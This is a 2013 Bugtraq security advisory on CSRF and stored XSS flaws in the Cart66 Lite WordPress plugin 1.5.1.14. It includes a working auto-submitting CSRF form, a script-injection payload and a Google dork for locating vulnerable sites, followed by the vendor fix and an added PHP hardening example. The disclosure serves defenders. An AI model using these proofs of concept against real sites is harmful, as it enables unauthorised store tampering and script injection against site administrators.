Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
- From: jsibley1@xxxxxxxxx
- Date: Sat, 12 Oct 2013 03:42:37 GMT
# Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author: absane
# Blog: http://blog.noobroot.com
# Discovery date: September 29th 2013
# Vendor notified: September 29th 2013
# Vendor fixed: October 12 2013
# Vendor Homepage: http://cart66.com
# Software Link: http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on: Wordpress 3.6.1
# Google-dork: inurl:/wp-content/plugins/cart66
# CVE (CSRF): CVE-2013-5977
# CVE (XSS): CVE-2013-5978
Two vulnerabilities were discovered in the Wordpress plugin Cart66 version
1.5.1.14.
Vulnerabilities:
1) CSRF
2) Code Injection
VULNERABILITY #1
************
*** CSRF ***
************
Page affected:
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products
================
Proof of Concept
================
<html><body>
<!-- Auto-submitting form: the admin page accepts the POST without a nonce check -->
<form name="csrf_form"
      action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products"
      method="post" enctype="multipart/form-data" id="products-form">
  <input type="hidden" name="cart66-action" value="save product" />
  <input type="hidden" name="product[id]" value="" />
  <input class="long" type="hidden" name="product[name]" id="product-name" value="absane was here" />
  <input type="hidden" name="product[item_number]" id="product-item_number" value="1337" />
  <input type="hidden" id="product-price" name="product[price]" value="13.37" />
  <input type="hidden" id="product-price_description" name="product[price_description]" value="LuLz" />
  <input type="hidden" id="product-is_user_price" name="product[is_user_price]" value="0" />
  <input type="hidden" id="product-min_price" name="product[min_price]" value="" />
  <input type="hidden" id="product-max_price" name="product[max_price]" value="" />
  <input type="hidden" id="product-taxable" name="product[taxable]" value="0" />
  <input type="hidden" id="product-shipped" name="product[shipped]" value="1" />
  <input type="hidden" id="product-weight" name="product[weight]" value="" />
  <input type="hidden" id="product-min_qty" name="product[min_quantity]" value="" />
  <input type="hidden" id="product-max_qty" name="product[max_quantity]" value="" />
</form>
<script type="text/javascript">document.csrf_form.submit();</script>
</body></html>
VULNERABILITY #2
***********************
*** Code Injection ***
***********************
Page affected:
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the
following input fields:
* Product name
* Price description
================
Proof of Concept
================
In the vulnerable fields add <script>alert(0)</script> or any other code. The
input is written to the database exactly as submitted.
Input is not sanitized and the code can be executed in ways that depend on the
circumstances. During testing, the theme 'iShop 1.0.0' was used and the PoC
JavaScript code was executed when I attempted to add a product or modify an
existing product.
]....................................[
]..............SOLUTIONS.............[
]....................................[
Update to version 1.5.1.15 or greater.
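The following is an added illustration, not Cart66's own code, of how a WordPress
admin "save product" handler closes both reported holes: a nonce plus a capability
check stops the auto-submitting CSRF form above, and sanitizing the product name and
price description before storage (and escaping on output) stops the stored script.
All function names, the 'manage_options' capability and the 'cart66_demo_products'
option key are assumptions chosen for this example.

```php
<?php
// Added example, not the plugin's code. Hypothetical names throughout.

// 1. Render the admin form with a nonce bound to one specific action.
function cart66_render_product_form() {
    ?>
    <form method="post">
        <?php wp_nonce_field( 'cart66_save_product', 'cart66_nonce' ); ?>
        <input type="hidden" name="cart66-action" value="save product" />
        <input type="text" name="product[name]" />
        <input type="text" name="product[price_description]" />
        <input type="text" name="product[price]" />
        <input type="submit" value="Save" />
    </form>
    <?php
}

// 2. Handle the POST. The nonce is tied to the logged-in user's session and to
//    this action, so a cross-site form like the PoC cannot supply a valid one.
function cart66_handle_save_product() {
    if ( ! isset( $_POST['cart66-action'] ) || $_POST['cart66-action'] !== 'save product' ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {   // assumed capability
        wp_die( 'Insufficient privileges.' );
    }
    // Dies with a 403 when the nonce is missing, expired, or for another action.
    check_admin_referer( 'cart66_save_product', 'cart66_nonce' );

    $raw = isset( $_POST['product'] ) ? (array) $_POST['product'] : array();

    // Strip tags/control chars from free-text fields, coerce numeric ones.
    // "<script>alert(0)</script>" becomes "alert(0)" and is no longer markup.
    $clean = array(
        'name'              => sanitize_text_field( $raw['name'] ?? '' ),
        'price_description' => sanitize_text_field( $raw['price_description'] ?? '' ),
        'price'             => floatval( $raw['price'] ?? 0 ),
    );

    $products   = get_option( 'cart66_demo_products', array() ); // assumed option key
    $products[] = $clean;
    update_option( 'cart66_demo_products', $products );
}
add_action( 'admin_init', 'cart66_handle_save_product' );

// 3. Escape on output too; storage-side sanitizing is not a substitute for it.
function cart66_render_product_name( $product ) {
    return esc_html( $product['name'] );
}
```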